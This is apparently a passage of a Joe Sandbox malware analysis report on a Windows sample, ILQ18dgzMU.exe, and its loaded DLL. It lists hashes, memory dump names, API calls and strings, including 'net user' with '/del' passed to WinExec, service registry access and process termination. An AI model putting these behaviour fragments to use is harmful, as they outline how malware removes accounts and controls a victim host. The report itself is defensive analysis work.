                        • Opcode ID: 8bd60a103a891dde2712e6e38d4571aaca0dfa570f8c9cafbc2fd2fd6e04d9c3
                        • Instruction ID: a7a377e570a6ccf4006725b132b15871cf8ba0bc900e0d3f4eac70dc391a4334
                        • Opcode Fuzzy Hash: 8bd60a103a891dde2712e6e38d4571aaca0dfa570f8c9cafbc2fd2fd6e04d9c3
                        • Instruction Fuzzy Hash: EEC09BB0401BA0E7FB049B718C4CB453A55D6857113404540F74195111D7795480AF19
                        Memory Dump Source
                        • Source File: 00000000.00000002.4082612578.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.4082597077.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4082631431.0000000000406000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4082647752.0000000000407000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4082671358.000000000042E000.00000008.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4082688873.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4082705565.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_ILQ18dgzMU.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c8a95432b831c7267b03fa961f98e7af2a702391516c768b6c9cf0bccdc06ddb
                        • Instruction ID: f96a3d1d10757f0d55ad1781d9d7bfbe656efa2b46a32013cb53c2e8976ff9eb
                        • Opcode Fuzzy Hash: c8a95432b831c7267b03fa961f98e7af2a702391516c768b6c9cf0bccdc06ddb
                        • Instruction Fuzzy Hash: A8712532A045147BEB226B25CD84FAF3A29AB413A4F150237FC15BA2F1E73CDD41969C
                        APIs
                        • HeapAlloc.KERNEL32(00000000,00002020,?,00000000,?,?,0040324A), ref: 004029C8
                        • VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,00000000,?,?,0040324A), ref: 004029EC
                        • VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,00000000,?,?,0040324A), ref: 00402A06
                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?,?,0040324A), ref: 00402AC7
                        • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,0040324A), ref: 00402ADE
                        Memory Dump Source
                        • Source File: 00000000.00000002.4082612578.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.4082597077.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4082631431.0000000000406000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4082647752.0000000000407000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4082671358.000000000042E000.00000008.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4082688873.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4082705565.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_ILQ18dgzMU.jbxd
                        Similarity
                        • API ID: AllocVirtual$FreeHeap
                        • String ID:
                        • API String ID: 714016831-0
                        • Opcode ID: e2da3ce05240604d240e5d9c3d1120620b1103eba999aa56c600187876e2bb5c
                        • Instruction ID: 125bce25715dd4f7fddf9a76bc6a9a36cf70974911cbcb035c38124f58abbfa0
                        • Opcode Fuzzy Hash: e2da3ce05240604d240e5d9c3d1120620b1103eba999aa56c600187876e2bb5c
                        • Instruction Fuzzy Hash: F731E170740B019BD731CF28ED89B26BAA4EB44B59F50413BE056AA2D0DBB8A841CB4C
                        APIs
                        • lstrlen.KERNEL32(74DF0F00,?,00000000,74DF0F00,00000000,10002725,00000000,?), ref: 100011CE
                        • ??2@YAPAXI@Z.MSVCRT(00000001), ref: 100011D8
                        • strchr.MSVCRT ref: 100011FA
                        • strchr.MSVCRT ref: 10001213
                        • atoi.MSVCRT(00000001), ref: 10001220
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: strchr$??2@atoilstrlen
                        • String ID:
                        • API String ID: 3786266066-0
                        • Opcode ID: dae428b9acc3bb0b47e850492135e199fcdf30e39ab31222b8f3c7346d6b0b81
                        • Instruction ID: 1fb9c14f2e3f972c556b5afa14bd55f78d79fd110d4c99c8390d6c97146cdd35
                        • Opcode Fuzzy Hash: dae428b9acc3bb0b47e850492135e199fcdf30e39ab31222b8f3c7346d6b0b81
                        • Instruction Fuzzy Hash: 8E01F5326003645FEB009B699C447ABB7DAEFCA351F040069EA44CB300D7B16905CB62
                        APIs
                        • ??2@YAPAXI@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,1006A1B8,000000FF), ref: 1000ED36
                          • Part of subcall function 1000E6B0: RegOpenKeyExA.ADVAPI32(?,00000000,00000000,000F003F,10010B75,00000000,10010B75,?,SYSTEM\CurrentControlSet\Services\%s,00000000,80000002,00000000,?,?), ref: 1000E6C8
                        • ??3@YAXPAX@Z.MSVCRT(00000000,00000000), ref: 1000ED88
                        • ??2@YAPAXI@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,1006A1B8,000000FF), ref: 1000ED98
                        • ??3@YAXPAX@Z.MSVCRT(?), ref: 1000EDF2
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: ??2@??3@$Open
                        • String ID:
                        • API String ID: 2374869923-0
                        • Opcode ID: 9e19db815c60587931948160d3a28b3c914f7ef16ea15ea8ed3e0a803438db8c
                        • Instruction ID: 64974c1327e54e55cf0e1af65d710c0e849b65887b199428c9043e7f6ecf557d
                        • Opcode Fuzzy Hash: 9e19db815c60587931948160d3a28b3c914f7ef16ea15ea8ed3e0a803438db8c
                        • Instruction Fuzzy Hash: 4731EE766046845BD308EE28CC9166BB3D6FBC8740F44493DF95A97381EB36ED09CB92
                        APIs
                        • LookupAccountSidA.ADVAPI32(00000000,?,00000000,00000000,00000000,00000001,00000000), ref: 10011A1D
                        • LookupAccountSidA.ADVAPI32(00000000,?,00000008,00000000,?,00000001,00000000), ref: 10011A63
                        • wsprintfA.USER32 ref: 10011A91
                        • 746A24A0.WTSAPI32(?), ref: 10011AA7
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: AccountLookup$wsprintf
                        • String ID:
                        • API String ID: 1244087393-0
                        • Opcode ID: 8ed260b9186e04422498aef0bc553d55f17dcaeb644841c3a8f9ac8f5b1bf6c0
                        • Instruction ID: 0fd99e425747e76a7f083c64f372aaac6d8492bea7266781f3ff252f3aeb8c8a
                        • Opcode Fuzzy Hash: 8ed260b9186e04422498aef0bc553d55f17dcaeb644841c3a8f9ac8f5b1bf6c0
                        • Instruction Fuzzy Hash: D6314E71209346AFE714CE54C8D4DABB7E9FFC8244F504E2DF68597240E670EE498B62
                        APIs
                        • LocalSize.KERNEL32(00000000), ref: 1000E9FE
                        • LocalFree.KERNEL32(00000000,00000000,00000000), ref: 1000EA0A
                        • LocalSize.KERNEL32(00000000), ref: 1000EA25
                        • LocalFree.KERNEL32(00000000,00000000,00000000), ref: 1000EA31
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: Local$FreeSize
                        • String ID:
                        • API String ID: 2726095061-0
                        • Opcode ID: 9b743251187909aee0ad9be3953de43cb8f720caaf3eee6a15f90d1a5f0ef3cb
                        • Instruction ID: 478b3d063ec124332ba6cffa6dcdc5e6aef98eb324571a0519443ce4427bd314
                        • Opcode Fuzzy Hash: 9b743251187909aee0ad9be3953de43cb8f720caaf3eee6a15f90d1a5f0ef3cb
                        • Instruction Fuzzy Hash: C91193352056909BF225EB24CC92BFFB399EF8A390F004929F851632C5DF74AD0587A7
                        APIs
                        • FreeLibrary.KERNEL32(?,00000000,E9C11475,?,0040110E,00000000,00407050,00025B6E,000007E9,00000000,0040166A,?), ref: 004014C3
                        • VirtualFree.KERNEL32(?,00000000,00008000,E9C11475,?,0040110E,00000000,00407050,00025B6E,000007E9,00000000,0040166A,?), ref: 004014E7
                        • GetProcessHeap.KERNEL32(00000000,?,E9C11475,?,0040110E,00000000,00407050,00025B6E,000007E9,00000000,0040166A,?), ref: 004014EF
                        • HeapFree.KERNEL32(00000000), ref: 004014F6
                        Memory Dump Source
                        • Source File: 00000000.00000002.4082612578.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.4082597077.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4082631431.0000000000406000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4082647752.0000000000407000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4082671358.000000000042E000.00000008.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4082688873.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4082705565.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_ILQ18dgzMU.jbxd
                        Similarity
                        • API ID: Free$Heap$LibraryProcessVirtual
                        • String ID:
                        • API String ID: 548792435-0
                        • Opcode ID: 7062f5a0ac8085ff3908f49efe8d1e95656ad2264a7c42e5a2d975c876b4dca1
                        • Instruction ID: 1a79a4596b48e4e30b7297cdf9259662fa10b5e590b9a6e86bf00a82a7cc2a21
                        • Opcode Fuzzy Hash: 7062f5a0ac8085ff3908f49efe8d1e95656ad2264a7c42e5a2d975c876b4dca1
                        • Instruction Fuzzy Hash: 6C01DB76500611AFC7209FA9DDC4D27B7EDAB44325715893EF2AAA36B0C738A8418B54
                        APIs
                        • WaitForSingleObject.KERNEL32(?,000000FF,00000000,74DF2EE0,?,00000000,10069E7C,000000FF,100028C0), ref: 10003ACC
                        • CloseHandle.KERNEL32(?), ref: 10003AEF
                        • CloseHandle.KERNEL32(?), ref: 10003AF8
                        • WSACleanup.WS2_32 ref: 10003AFA
                          • Part of subcall function 10003FC0: setsockopt.WS2_32(?,0000FFFF,00000080,00000000), ref: 10003FEA
                          • Part of subcall function 10003FC0: CancelIo.KERNEL32(?), ref: 10003FF7
                          • Part of subcall function 10003FC0: InterlockedExchange.KERNEL32(?,00000000), ref: 10004006
                          • Part of subcall function 10003FC0: closesocket.WS2_32(?), ref: 10004013
                          • Part of subcall function 10003FC0: SetEvent.KERNEL32(?), ref: 10004020
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseHandle$CancelCleanupEventExchangeInterlockedObjectSingleWaitclosesocketsetsockopt
                        • String ID:
                        • API String ID: 136543108-0
                        • Opcode ID: 634793217506f191db49a08dabb9ee3f7c7a2b72bc87fda37cb6dcc7b8f1c163
                        • Instruction ID: 5bfc93a864bc07e7b47afb1c99583d44f41eea366a3187d476b79e86f3b5488c
                        • Opcode Fuzzy Hash: 634793217506f191db49a08dabb9ee3f7c7a2b72bc87fda37cb6dcc7b8f1c163
                        • Instruction Fuzzy Hash: 9E112B35114B919FE315DF28C944B5BB7E9EB85720F508A0DE0A6426D1CBB8A909CBA2
                        APIs
                        • Sleep.KERNEL32(00000001), ref: 1001164F
                        • TerminateThread.KERNEL32(?,00000000), ref: 10011668
                        • Sleep.KERNEL32(00000001), ref: 10011670
                        • TerminateProcess.KERNEL32(?,00000001), ref: 10011678
                          • Part of subcall function 10003FC0: setsockopt.WS2_32(?,0000FFFF,00000080,00000000), ref: 10003FEA
                          • Part of subcall function 10003FC0: CancelIo.KERNEL32(?), ref: 10003FF7
                          • Part of subcall function 10003FC0: InterlockedExchange.KERNEL32(?,00000000), ref: 10004006
                          • Part of subcall function 10003FC0: closesocket.WS2_32(?), ref: 10004013
                          • Part of subcall function 10003FC0: SetEvent.KERNEL32(?), ref: 10004020
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: SleepTerminate$CancelEventExchangeInterlockedProcessThreadclosesocketsetsockopt
                        • String ID:
                        • API String ID: 3242870944-0
                        • Opcode ID: 2196a195735274d6bf8c3d4dc2ef0f2112ce8a3263a4541f5427cbdab3e13d9a
                        • Instruction ID: 27f78afd7f630ef31bf47fb096b80eefde634334e31a038b81b66bd7d71fe0eb
                        • Opcode Fuzzy Hash: 2196a195735274d6bf8c3d4dc2ef0f2112ce8a3263a4541f5427cbdab3e13d9a
                        • Instruction Fuzzy Hash: 22F04932240350AFE310EB65CC85F57B7E5BB89720F004A1DF6999B2D0D6B1F840CB51
                        APIs
                        • GetInputState.USER32 ref: 100069C3
                        • GetCurrentThreadId.KERNEL32 ref: 100069CF
                        • PostThreadMessageA.USER32(00000000), ref: 100069D6
                        • GetMessageA.USER32(00000000,00000000,00000000,00000000), ref: 100069E7
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: MessageThread$CurrentInputPostState
                        • String ID:
                        • API String ID: 2517755969-0
                        • Opcode ID: f068882617931f03d063f58f9d32d767fe4a38755a4332fb425594b53d04b317
                        • Instruction ID: be37903158f8ce1355c4e343a4486a1e9724d5febc653840301b138d8f38b73e
                        • Opcode Fuzzy Hash: f068882617931f03d063f58f9d32d767fe4a38755a4332fb425594b53d04b317
                        • Instruction Fuzzy Hash: 60D0C77168036077FB107BE48C4FF463A297B04B01F900454F705DA1E1D6F456148B67
                        APIs
                        • GetCPInfo.KERNEL32(00000000,?,?,00000000,00000000,?,?,00401DAF), ref: 004046D9
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4082612578.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.4082597077.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4082631431.0000000000406000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4082647752.0000000000407000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4082671358.000000000042E000.00000008.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4082688873.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4082705565.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_ILQ18dgzMU.jbxd
                        Similarity
                        • API ID: Info
                        • String ID: HB$XB
                        • API String ID: 1807457897-3584453872
                        • Opcode ID: 4c37e6a83d63de9d2fb2b44ecfe72da2f89996fac8cd49a487bff374a2131383
                        • Instruction ID: d4833c5b677eb040447b0e5d1f2c88bdbccd8c5be6ae427099e583a284eb64d3
                        • Opcode Fuzzy Hash: 4c37e6a83d63de9d2fb2b44ecfe72da2f89996fac8cd49a487bff374a2131383
                        • Instruction Fuzzy Hash: 9E417EB96441909EE720EF74E8403667BB19B86304FA4887BD744F72E1C73E494A879D
                        APIs
                        • GetCPInfo.KERNEL32(?,00000000), ref: 004048E4
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4082612578.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.4082597077.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4082631431.0000000000406000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4082647752.0000000000407000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4082671358.000000000042E000.00000008.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4082688873.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4082705565.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_ILQ18dgzMU.jbxd
                        Similarity
                        • API ID: Info
                        • String ID: $
                        • API String ID: 1807457897-3032137957
                        • Opcode ID: 263621409502b165fc90dc6ac40275e9da63e8f769559f170b621f7e3eaae7e0
                        • Instruction ID: afefa19f00cfb59d49103e56bb47d0362d5b0b4d9a5c217c2fcf475354c60b3e
                        • Opcode Fuzzy Hash: 263621409502b165fc90dc6ac40275e9da63e8f769559f170b621f7e3eaae7e0
                        • Instruction Fuzzy Hash: 8341AAB12402585AEB22D764DD49BEB3FA89B42700F8400F6D749E71D3C2794949DBBE
                        APIs
                        • WinExec.KERNEL32(00000000,00000000), ref: 1000B4D6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: Exec
                        • String ID: /del$net user
                        • API String ID: 459137531-2512890511
                        • Opcode ID: 91d8367e343b3af0dc84c5d67d22bb34f7c443041aa661ca2b2a57c5264f0420
                        • Instruction ID: ab36fe985a1cdb475bc27265b5430908ddbc4f3a83551e633133ded5876f8b47
                        • Opcode Fuzzy Hash: 91d8367e343b3af0dc84c5d67d22bb34f7c443041aa661ca2b2a57c5264f0420
                        • Instruction Fuzzy Hash: 3111D076600A085BD71CCA38D8906AB76D2FBC4330F244B3EFA66C32D0DEB98D49C255
                        APIs
                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\ILQ18dgzMU.exe,00000104,?,00000000,?,?,?,?,00401DAF), ref: 004036CD
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4082612578.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.4082597077.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4082631431.0000000000406000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4082647752.0000000000407000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4082671358.000000000042E000.00000008.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4082688873.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4082705565.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_ILQ18dgzMU.jbxd
                        Similarity
                        • API ID: FileModuleName
                        • String ID: C:\Users\user\Desktop\ILQ18dgzMU.exe$`%G
                        • API String ID: 514040917-1292026093
                        • Opcode ID: 157db99772176f6e922919b32deba600d816f0bed860eb8f39c773135dfa13ae
                        • Instruction ID: 9b5b162b2e34576d815ca683353452d89f1889f74bab53538c3552c1a8d74188
                        • Opcode Fuzzy Hash: 157db99772176f6e922919b32deba600d816f0bed860eb8f39c773135dfa13ae
                        • Instruction Fuzzy Hash: 60118FB6A00108BFD721EF98DC81C9B7BBCEB45758B40007BF505E3242E6746F498BA8
                        APIs
                        • EnumWindows.USER32(Function_0000C790,00000000), ref: 1000CD1E
                          • Part of subcall function 10004040: _ftol.MSVCRT ref: 1000407F
                          • Part of subcall function 10004040: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 10004089
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: ??2@EnumWindows_ftol
                        • String ID: {$|
                        • API String ID: 1507428005-264143378
                        • Opcode ID: b0026d0be66f1eda29ea7d483d4eb73902614b2ddebdd420a585239467d1b67b
                        • Instruction ID: 48f960eb61c7d18a63d45d5ac053b42ebbae987953eee1fc5e80c4f33b21dade
                        • Opcode Fuzzy Hash: b0026d0be66f1eda29ea7d483d4eb73902614b2ddebdd420a585239467d1b67b
                        • Instruction Fuzzy Hash: 2501DB72604248DFE714DF64D855BAEB7A5FB88310F00426EEA0997281CB795D04C750
                        APIs
                        • GetSystemDirectoryA.KERNEL32(?,00000100), ref: 10006A13
                        • sprintf.MSVCRT ref: 10006A5E
                        Strings
                        • \Program Files\Internet Explorer\IEXPLORE.EXE, xrefs: 10006A19
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: DirectorySystemsprintf
                        • String ID: \Program Files\Internet Explorer\IEXPLORE.EXE
                        • API String ID: 2264545904-1152295267
                        • Opcode ID: 4c9d0e8e0a58ad294016534cb1870cde04a4299a1cf7151f2c2b22f50b8e60b1
                        • Instruction ID: 26e6067db21bf9f093eba691515bc3598a3c42f118b52c7456066b92f6eaefac
                        • Opcode Fuzzy Hash: 4c9d0e8e0a58ad294016534cb1870cde04a4299a1cf7151f2c2b22f50b8e60b1
                        • Instruction Fuzzy Hash: 83F0F6326042042BD3188678DC99BDB7B8AEBC4331F54872EFAA6872C0D9B98908C255
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
